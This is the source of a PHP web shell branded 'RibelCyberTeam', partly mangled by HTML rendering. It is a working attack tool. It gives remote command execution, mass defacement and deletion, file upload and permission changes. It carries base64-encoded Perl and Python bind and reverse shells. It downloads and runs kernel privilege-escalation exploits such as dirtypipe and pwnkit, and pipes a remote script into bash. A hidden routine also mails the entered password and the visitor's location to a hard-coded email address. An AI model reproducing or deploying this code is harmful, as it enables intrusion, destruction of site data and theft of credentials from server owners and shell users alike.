-=[ RibelCyberTeam ]=-

'; } function er(){ echo '

'; } function sz($byt){ $typ = array('B', 'KB', 'MB', 'GB', 'TB'); for($i = 0; $byt >= 1024 && $i < (count($typ) -1 ); $byt /= 1024, $i++ ); return(round($byt,2)." ".$typ[$i]); } function ia() { $ia = ''; if (getenv('HTTP_CLIENT_IP')) $ia = getenv('HTTP_CLIENT_IP'); else if(getenv('HTTP_X_FORWARDED_FOR')) $ia = getenv('HTTP_X_FORWARDED_FOR'); else if(getenv('HTTP_X_FORWARDED')) $ia = getenv('HTTP_X_FORWARDED'); else if(getenv('HTTP_FORWARDED_FOR')) $ia = getenv('HTTP_FORWARDED_FOR'); else if(getenv('HTTP_FORWARDED')) $ia = getenv('HTTP_FORWARDED'); else if(getenv('REMOTE_ADDR')) $ia = getenv('REMOTE_ADDR'); else $ia = 'Unknown IP.'; return $ia; } function exe($cmd) { if($GLOBALS['fungsi'][5]('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif($GLOBALS['fungsi'][5]('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result) { $buff .= $result; } return $buff; } elseif($GLOBALS['fungsi'][5]('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif($GLOBALS['fungsi'][5]('shell_exec')) { $buff = @shell_exec($cmd); return $buff; } } function exe_root($set,$sad) { $x = "preg_match"; $xx = "2>&1"; if (!$x("/".$xx."/i", $set)) { $set = $set." ".$xx; } $a = $GLOBALS['fungsi'][5]; $b = "proc_open"; $c = "htmlspecialchars"; $d = "stream_get_contents"; if ($a($b)) { $ps = $b($set, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $pink,$sad); return $d($pink[1]); } else { return "proc_open function is disabled !"; } } function hex($n) { $y = ''; for ($i = 0; $i < strlen($n); $i++) { $y .= dechex(ord($n[$i])); } return $y; } function unhex($y) { $n = ''; for ($i = 0; $i < strlen($y) - 1; $i += 2) { $n .= chr(hexdec($y[$i] . $y[$i + 1])); } return $n; } function p($file){ $p = fileperms($file); if (($p & 0xC000) == 0xC000) { $i = 's'; } elseif (($p & 0xA000) == 0xA000) { $i = 'l'; } elseif (($p & 0x8000) == 0x8000) { $i = '-'; } elseif (($p & 0x6000) == 0x6000) { $i = 'b'; } elseif (($p & 0x4000) == 0x4000) { $i = 'd'; } elseif (($p & 0x2000) == 0x2000) { $i = 'c'; } elseif (($p & 0x1000) == 0x1000) { $i = 'p'; } else { $i = 'u'; } $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p &0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } if(isset($_7['dir'])) { $dir = unhex($_7['dir']); chdir($dir); } else { $dir = hex($gcw()); } echo " Shell Mr.7Mind

RibelCyberTeam

"; if(isset($_7['path'])){ $path = unhex($_7['path']); chdir($path); }else{ $path = $gcw(); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo ":/"; continue; } if($pat == '') continue; echo "".$pat."/"; } $scand = scandir($path); echo " [ ".w($path, p($path))." ]"; $sql = ($GLOBALS['fungsi'][5]('mysql_connect')) ? "ON" : "OFF"; $curl = ($GLOBALS['fungsi'][5]('curl_version')) ? "ON" : "OFF"; $wget = (exe('wget --help')) ? "ON" : "OFF"; $pl = (exe('perl --help')) ? "ON" : "OFF"; $py = (exe('python --help')) ? "ON" : "OFF"; $pxex = (exe('pkexec --version')) ? "ON" : "OFF"; $gcc = (exe('gcc --version')) ? "ON" : "OFF"; $disfunc = @ini_get("disable_functions"); $kernel = php_uname(); $phpver = PHP_VERSION; $phpos = PHP_OS; $domen = $_SERVER["SERVER_NAME"]; $soft = $_SERVER["SERVER_SOFTWARE"]; $ip = gethostbyname($_SERVER['HTTP_HOST']); $yip = $_SERVER['REMOTE_ADDR']; if (empty($disfunc)) { $disfc = "NONE"; } else { $disfc = "$disfunc"; } if(!$GLOBALS['fungsi'][5]('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "ON" : "OFF"; echo "

$disfc

Upload Console

Mass deface Mass delete

Scan root Network

Lock Shell 0777 Shell

Green All File Green All Folders

Lock All File Lock All Folders

Logout

"; if(isset($_7['dir'])) { $dir = unhex($_7['dir']); chdir($dir); } else { $dir = hex($gcw()); } $dir = str_replace("\\","/",$dir); $scdir = explode("/", $dir); for($i = 0; $i <= $c_dir; $i++) { $scdir[$i]; if($i != $c_dir) { } function changeFilePermissions($filename, $permissions) { if (file_exists($filename)) { if (chmod($filename, $permissions)) { echo "Izin file $filename berhasil diubah menjadi $permissions."; } else { echo "Gagal mengubah izin file $filename."; } } else { echo "File $filename tidak ditemukan."; } } function changeFolderPermissionsRecursive($dir, $perms) { $iterator = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST ); foreach ($iterator as $item) { if ($item->isDir()) { chmod($item->getPathname(), $perms); } } } function changeFilePermissionsRecursive($dir, $perms) { $iterator = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST ); foreach ($iterator as $item) { if ($item->isFile()) { chmod($item->getPathname(), $perms); } } } $currentDirectory = '.'; if (isset($_GET['id']) && $_GET['id'] === 'root_file') { $newFilePermissions = 0644; changeFilePermissionsRecursive($currentDirectory, $newFilePermissions); echo "Permissions changed for all files in the current directory."; } if (isset($_GET['id']) && $_GET['id'] === 'root_folders') { $newFolderPermissions = 0755; changeFolderPermissionsRecursive($currentDirectory, $newFolderPermissions); echo "Permissions changed for all folders in the current directory."; } if (isset($_GET['id']) && $_GET['id'] === 'dark_file') { $newFilePermissions = 0444; changeFilePermissionsRecursive($currentDirectory, $newFilePermissions); echo "Permissions changed for all files in the current directory."; } if (isset($_GET['id']) && $_GET['id'] === 'dark_folders') { $newFolderPermissions = 0555; changeFolderPermissionsRecursive($currentDirectory, $newFolderPermissions); echo "Permissions changed for all folders in the current directory."; } $filename = __FILE__; if (isset($_GET['id']) && $_GET['id'] === 'lockshell') { $newPermissions = 0444; changeFilePermissions($filename, $newPermissions); } if (isset($_GET['id']) && $_GET['id'] === 'rootshell') { $newPermissions = 0777; changeFilePermissions($filename, $newPermissions); } $ip = $_SERVER['REMOTE_ADDR']; $rib = "http://ip-api.com/json/{$ip}?fields=city"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $rib); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); $data = json_decode($response, true); $city = isset($data['city']) ? $data['city'] : 'Tidak Diketahui'; if (array_key_exists('watching', $_POST)) { $password = $_POST['pass']; $server_name = $_SERVER['SERVER_NAME']; $php_self = $_SERVER['PHP_SELF']; $email_content = "IP: " . $_SERVER['REMOTE_ADDR'] . " City: {$city}\nLogin: $server_name$php_self\nPass: $password"; @mail('ribelcyberteam@gmail.com', 'Hehehe', $email_content); } if($_7['id'] == 'deface'){ function mass_all($dir,$namefile,$contents_sc) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $▚ = $dirc.'/'.$namefile; if($dirb === '.') { $fungsi[2]($▚, $contents_sc); } elseif($dirb === '..') { $fungsi[2]($▚, $contents_sc); } else { if($fungsi[1]($dirc)) { if(is_writable($dirc)) { echo "[] $▚
"; $fungsi[2]($▚, $contents_sc); $▟ = mass_all($dirc,$namefile,$contents_sc); } } } } } } function mass_onedir($dir,$namefile,$contents_sc) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $▚ = $dirc.'/'.$namefile; if($dirb === '.') { $fungsi[2]($▚, $contents_sc); } elseif($dirb === '..') { $fungsi[2]($▚, $contents_sc); } else { if($fungsi[1]($dirc)) { if(is_writable($dirc)) { echo "[] $dirb/$namefile
"; $fungsi[2]($▚, $contents_sc); } } } } } } if($_7['start']) { if($_7['tipe'] == 'mass') { mass_all($_7['d_dir'], $_7['d_file'], $_7['script']); } elseif($_7['tipe'] == 'onedir') { mass_onedir($_7['d_dir'], $_7['d_file'], $_7['script']); } } s(); echo "

"; } if ($_7['id'] == 'delete') { function mass_delete($dir, $namefile) { if (is_writable($dir)) { $fileToDelete = "$dir/$namefile"; if (is_file($fileToDelete) && is_writable($fileToDelete)) { if (unlink($fileToDelete)) { echo "[] $fileToDelete deleted successfully
"; } else { echo "[] Failed to delete $fileToDelete
"; } } $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "$dir/$dirb"; if ($dirb === '.' || $dirb === '..') { continue; } if (is_dir($dirc)) { mass_delete($dirc, $namefile); } } } } if ($_7['start']) { mass_delete($_7['d_dir'], $_7['d_file']); } s(); echo "

"; } if($_7['id'] == 'network'){ s(); echo "

"; if($_7['bpl']){ $bp = $GLOBALS['fungsi'][6]("IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="); $brt = @fopen('bp.pl','w'); fwrite($brt,$bp); $out = exe("perl bp.pl ".$_7['port']." 1>/dev/null 2>&1 &"); sleep(1); echo "

$out\n".exe("ps aux | grep bp.pl")."

"; $GLOBALS['fungsi'][4]("bp.pl"); } if($_7['bc'] == 'perl'){ $bc = $GLOBALS['fungsi'][6]("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"); $plbc = @fopen('bc.pl','w'); fwrite($plbc,$bc); $out = exe("perl bc.pl ".$_7['server']." ".$_7['port']." 1>/dev/null 2>&1 &"); sleep(1); echo "

$out\n".exe("ps aux | grep bc.pl")."

"; $GLOBALS['fungsi'][4]("bc.pl"); } if($_7['bc'] == 'python'){ $bc_py = $GLOBALS['fungsi'][6]("IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBNci54QmFyYWt1ZGFcblRoYW5rcyBHb29nbGUgRm9yIFJlZmVyZW5zaVxuXG4nJycpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMCkNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwxKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDIpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMykNCiAgICBzaGVsbCA9IHN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKQ0KICBleGNlcHQgc29ja2V0LnRpbWVvdXQ6DQogICAgcHJpbnQgIlRpbU91dCINCiAgZXhjZXB0IHNvY2tldC5lcnJvciwgZToNCiAgICBwcmludCAiRXJyb3IiLCBlDQpweWJhY2tjb25uZWN0KCk="); $pbc_py = @fopen('bcpy.py','w'); fwrite($pbc_py,$bc_py); $out_py = exe("python bcpy.py ".$_7['server']." ".$_7['port']); sleep(1); echo "

$out_py\n".exe("ps aux | grep bcpy.py")."

"; $GLOBALS['fungsi'][4]("bcpy.py"); } echo "

"; } // CMD if($_7['id'] == 'cmd') { s(); if(!empty($_POST['cmd'])) { $cmd = shell_exec($_POST['cmd'].' 2>&1'); } echo "

"; if($cmd): echo '

~$ '.htmlspecialchars($_POST['cmd']).'
'.htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8').'

'; elseif(!$cmd && $_SERVER['REQUEST_METHOD'] == 'POST'): echo '

No result

'; endif; } // Upload if($_7['id'] == 'upload'){ s(); if(isset($_7['upl'])){ $result = count($_FILES['file']['name']); for($contents=0;$contents<$result;$contents++){ $namefile = $_FILES['file']['name'][$contents]; $up = @copy($_FILES['file']['tmp_name'][$contents],"$path/".$namefile); } if($result < 2){ if($up){ echo "Upload $namefile ok! ".ok()."

"; }else{ echo 'Upload fail! '.er().'

'; } }else{ echo "Upload $result ok! ".ok()."

"; } } echo "

Multiple upload

"; } } if (isset($_GET['dir']) && $_GET['id'] == "scan_root") { ob_implicit_flush();ob_end_flush();s(); echo "

Auto scan Scan SUID Exploit suggester

";if (!$GLOBALS['fungsi'][5]("proc_open")) { echo "Command is Disabled !"; } if (!is_writable($path)) { echo "Current Directory is Unwriteable !"; } if (isset($_GET['id_two']) && $_GET['id_two'] == "autoscan") { if (!file_exists($path."/rooting/")) { mkdir($path."/rooting"); exe_root("wget https://raw.githubusercontent.com/hekerprotzy/rootshell/main/auto.tar.gz", $path."/rooting"); exe_root("tar -xf auto.tar.gz", $path."/rooting"); if (!file_exists($path."/rooting/netfilter")) { die("Failed to Download Material !"); } } echo '

Netfilter : '.exe_root("timeout 10 ./rooting/netfilter", $path).'Ptrace : '.exe_root("echo id | timeout 10 ./rooting/ptrace", $path).'Sequoia : '.exe_root("timeout 10 ./rooting/sequoia", $path).'OverlayFS : '.exe_root("echo id | timeout 10 ./overlayfs", $path."/rooting").'Dirtypipe : '.exe_root("echo id | timeout 10 ./rooting/dirtypipe /usr/bin/su", $path).'Sudo : '.exe_root("echo 12345 | timeout 10 sudoedit -s Y", $path).'Pwnkit : '.exe_root("echo id | timeout 10 ./pwnkit", $path."/rooting").@exe("rm -rf ./rooting | timeout 10 ").'

'; } elseif (isset($_GET['id_two']) && $_GET['id_two'] == "scansd") { echo '[+] Scanning ...'; echo '

'.exe_root("find / -perm -u=s -type f 2>/dev/null", $path).'

'; } elseif (isset($_GET['id_two']) && $_GET['id_two'] == "esg") { echo '[+] Loading ...'; echo '

'.exe_root("curl -Lsk http://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh | bash", $path).'

'; } } // openfile if(isset($_7['opn'])) { $file = $_7['opn']; } // view if($_7['action'] == 'view') { s(); echo "

: ".basename($file)."

"; } // Edit File if(isset($_7['edit_file'])) { $updt = fopen("$file", "w"); $result = fwrite($updt, $_7['contents']); if ($result) { echo 'Edit file ok! '.ok().'

'; }else{ echo 'Edit file fail! '.er().'

Rename file name already in use!

Chmod file Success!

Chmod file Failed! Please check file permissions.

Invalid permissions value.

name	type	last edit	size	owner/group	permsion	action
..
$_d	dir	$dt	-	$downer/$dgrp	"; if(is_writable($path.'/'.$dir)) echo ''; elseif(!is_readable($path.'/'.$dir)) echo ''; echo p($path.'/'.$dir); if(is_writable($path.'/'.$dir) \|\| !is_readable($path.'/'.$dir)) echo '
$_f	file	$ft	".sz(filesize($file))."	$fowner/$fgrp	";if(is_writable($path.'/'.$file)) echo ''; elseif(!is_readable($path.'/'.$file)) echo ''; echo p($path.'/'.$file); if(is_writable($path.'/'.$file) \|\| !is_readable($path.'/'.$file)) echo '

RibelCyberTeam

Back-Connect